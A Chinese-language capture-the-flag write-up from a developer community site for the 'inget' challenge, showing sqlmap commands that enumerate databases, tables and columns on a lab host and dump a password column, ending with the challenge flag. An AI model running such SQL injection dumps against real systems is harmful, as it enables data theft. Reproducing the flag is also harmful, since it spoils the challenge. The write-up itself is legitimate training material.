AI 助理
备案控制台
开发者社区 数据库 文章 正文

攻防世界--inget

2024-05-22 186
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 攻防世界--inget

做题记录(这道题考察sql注入用到了sqlmap)

1.来到题目链接(提示请输入ID,然后尝试绕过)

2.在kali中使用sqlmap,在终端输入/usr/share/sqlmap  进入sqlmap,接下来爆数据库

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -dbs

3.得到数据库名

4.接下来爆表名(只需要修改后面的就可)

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -D cyber --tables

5.接下来爆字段

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -D cyber -T cyber --columns

6.选择pw字段就可以看到里面的信息(flag)

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -D cyber -T cyber -C pw -dump

cyberpeace{9934cf86dfe743c229c10d38da957f6d}

文章标签:
数据库
SQL
不拿flag不改名
目录
相关文章
不拿flag不改名
|
Go PHP
攻防世界web---fileinclude
攻防世界web---fileinclude
不拿flag不改名
582 0
不拿flag不改名
|
数据安全/隐私保护
攻防世界web-----easyupload
攻防世界web-----easyupload
不拿flag不改名
570 0
aliyun6054359135
|
存储 安全 数据安全/隐私保护
【攻防世界】catcat-new
【攻防世界】catcat-new
aliyun6054359135
545 0
Safenetworkaccess
攻防世界12-baby_web
攻防世界12-baby_web
Safenetworkaccess
151 1
Safenetworkaccess
|
存储 SQL 算法
攻防世界08-backup
攻防世界08-backup
Safenetworkaccess
138 1
Safenetworkaccess
|
前端开发 JavaScript
攻防世界10-disabled_button
攻防世界10-disabled_button
Safenetworkaccess
228 1
Safenetworkaccess
|
缓存 安全 PHP
攻防世界06-get_post
攻防世界06-get_post
Safenetworkaccess
460 1
香甜可口草莓蛋糕
|
安全 Java Linux
攻防世界:Misc 解析(一)
攻防世界:Misc 解析(一)
香甜可口草莓蛋糕
623 7
aliyun6054359135
|
安全 PHP
【攻防世界】file_include (PHP伪协议+过滤器)
【攻防世界】file_include (PHP伪协议+过滤器)
aliyun6054359135
733 0
Safenetworkaccess
|
BI
攻防世界4.ics-06
攻防世界4.ics-06
Safenetworkaccess
202 2